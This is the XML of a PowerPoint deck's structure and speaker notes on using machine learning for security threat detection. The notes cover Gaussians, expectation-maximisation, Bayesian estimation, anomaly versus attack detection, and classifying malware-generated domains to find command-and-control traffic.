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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="306" r:id="rId7"/>
    <p:sldId id="347" r:id="rId8"/>
    <p:sldId id="309" r:id="rId9"/>
    <p:sldId id="308" r:id="rId10"/>
    <p:sldId id="310" r:id="rId11"/>
    <p:sldId id="311" r:id="rId12"/>
    <p:sldId id="312" r:id="rId13"/>
    <p:sldId id="313" r:id="rId14"/>
    <p:sldId id="314" r:id="rId15"/>
    <p:sldId id="315" r:id="rId16"/>
    <p:sldId id="316" r:id="rId17"/>
    <p:sldId id="317" r:id="rId18"/>
    <p:sldId id="318" r:id="rId19"/>
    <p:sldId id="319" r:id="rId20"/>
    <p:sldId id="320" r:id="rId21"/>
    <p:sldId id="321" r:id="rId22"/>
    <p:sldId id="322" r:id="rId23"/>
    <p:sldId id="323" r:id="rId24"/>
    <p:sldId id="324" r:id="rId25"/>
    <p:sldId id="325" r:id="rId26"/>
    <p:sldId id="326" r:id="rId27"/>
    <p:sldId id="327" r:id="rId28"/>
    <p:sldId id="328" r:id="rId29"/>
    <p:sldId id="329" r:id="rId30"/>
    <p:sldId id="330" r:id="rId31"/>
    <p:sldId id="331" r:id="rId32"/>
    <p:sldId id="332" r:id="rId33"/>
    <p:sldId id="333" r:id="rId34"/>
    <p:sldId id="334" r:id="rId35"/>
    <p:sldId id="335" r:id="rId36"/>
    <p:sldId id="336" r:id="rId37"/>
    <p:sldId id="337" r:id="rId38"/>
    <p:sldId id="338" r:id="rId39"/>
    <p:sldId id="340" r:id="rId40"/>
    <p:sldId id="339" r:id="rId41"/>
    <p:sldId id="341" r:id="rId42"/>
    <p:sldId id="344" r:id="rId43"/>
    <p:sldId id="342" r:id="rId44"/>
    <p:sldId id="343" r:id="rId45"/>
    <p:sldId id="345" r:id="rId46"/>
    <p:sldId id="346" r:id="rId47"/>
    <p:sldId id="261"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C3C4"/>
    <a:srgbClr val="057FAF"/>
    <a:srgbClr val="055E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60" autoAdjust="0"/>
    <p:restoredTop sz="95682" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="634" y="77"/>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ED8282-D781-42D5-9DB2-7E05117BB950}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>28/06/2018</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EB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27540363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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21985407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Gaussians often feature in machine learning. So what is a Gaussian and why do we use it ? First of all Gaussian is what you might have heard of as a bell distribution. It basically means that most values are close to the average and that the below and above average values can be predicted by the distance from the average. Here I show a gaussian for something with two values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> length and height of a group of people. Why Gaussian is that it does reflect real life pretty well and also the mathematics happens to work out nicely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36926327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 generative we are trying to model the data. In this case we are assuming the data follows a Gaussian model and we are trying to determine the parameters of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gaussion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Start with an initial estimate of what each parameter might be.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Compute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>likelihood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that each parameter produces the data point (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>expectation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Calculate weights for each data point based on the likelihood of it being produced by a parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Combine these weights together with the data to compute a better estimate for the parameters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>maximisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Repeat steps 2 to 4 until the parameter estimate converges (the process stops producing a different estimate).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457166"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2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15621932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914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>Bayes Rule:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>The Posterior  </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="en-GB"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 </m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>Likelihood x Prior</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>In normal English </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" sz="1600" dirty="0"/>
                  <a:t>the model parameters I am learning depends on the most likely model parameters given the data  I see multiplied by  my prior estimate of the model parameters</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>So I believe the data I am observing should behave in a certain way  but will update my belief based on what I actually see.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Very commonly used in Machine Learning especially in Recursive Bayesian Estimation from a very well known AI company. Does have its limitations as it assumes a prior model which lends itself to anomaly detection vs attack detection.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C00000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Anomaly detection means new data doesn’t conform to old where attack detection is trying to identify many ‘normal’ points that together point to an issue</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Notes Placeholder 2"/>
              <p:cNvSpPr>
                <a:spLocks noGrp="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph type="body" idx="1"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr/>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>Bayes Rule:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>The Posterior  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" i="0">
                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                    <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>∝</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" b="0" i="0">
                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                    <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>Likelihood x Prior</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>In normal English </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" sz="1600" dirty="0"/>
                  <a:t>the model parameters I am learning depends on the most likely model parameters given the data  I see multiplied by  my prior estimate of the model parameters</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="914400" lvl="2" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" dirty="0"/>
                  <a:t>So I believe the data I am observing should behave in a certain way  but will update my belief based on what I actually see.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Very commonly used in Machine Learning especially in Recursive Bayesian Estimation from a very well known AI company. Does have its limitations as it assumes a prior model which lends itself to anomaly detection vs attack detection.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C00000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Anomaly detection means new data doesn’t conform to old where attack detection is trying to identify many ‘normal’ points that together point to an issue</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:endParaRPr lang="en-GB" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28455916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Lets see each of the points above represent a combination of measurements of a somebody connecting to a web site for instance,  which browser they are using, which country they are coming from, error codes generated by their connection, number of pages they are visiting and we are trying to predict whether the connection is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>malicous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or not. The circle represents what our algorithm says is malicious. Green is truly malicious and red is benign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For supervised learning to be effective future input data must come from the same population distribution as the training data – or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The new data that I haven’t seen before needs to behave/look  the same way as the data that I used to train the model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> IN security we don’t have a lot of training data. We have lots of good data but not a lot of bad data… More on this later </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The real question to ask is not what the True Positive rate is ( most people will sell on this )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Question is how MANY are there 70% of 1000 events (30 incorrectly classified) is better than  98% of 20,000 events per day (400 incorrectly classified)!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5795719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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42428690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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1954084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 here is an example where the input data does not reflect the data I used to train the model…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We are introducing noise that gets amplified by the algorithm. This is because training data does not present data presented to Neural Network to identify.</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neither of the problems above are fully  addressed yet although there is a lot of academic work around this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28556453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Most of current applications works as glorified anomaly detection solutions  in other words detect things we broadly know about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some providers claim different but in essence they “still’ are offering anomaly detection … Possibly very smart anomaly detection where baseline keeps been updated  i.e. Recursive Bayesian Estimator but still anomaly detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Does not work for targeted attacks !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Discriminative models needs lot of training data which is simply not there. We have lots of examples of good data very little of attack data and the attack data is well known so we can easily circumvent by acting different to known attack data</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So do we pack up our AI &amp; ML libraries and send away the AI sales guys with a flee in the ear ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34451238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Lets look at two problems statements from our Managed Threat Detection  practise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We need to identify calls to C&amp;C servers from our customer networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Our analyst needs to analyse a huge volume of log messages from endpoint applications and operating systems on a daily basis and need to be able to focus on the messages that matter ( the system needs the ability to become smarter as we learn more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EB0847-AF8B-40AF-888B-A4889A5DFCA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54021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Difficult to blacklist as they are essentially random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Need to reverse engineer how they are generated and then create massive lists or sinkhole the DNS requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What if we could teach a ML classifier what normal looks like using names for the Alexa million and what abnormal looks like by supplying names from common families of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Would this classifier be able to identify suspicious domains?</a:t>
            </a:r>
          </a:p>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EB0847-AF8B-40AF-888B-A4889A5DFCA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22022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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14777663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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17812634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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22566755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EB0847-AF8B-40AF-888B-A4889A5DFCA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41427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technique that will be shared is a brand  new technique not published before yielding encouraging results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
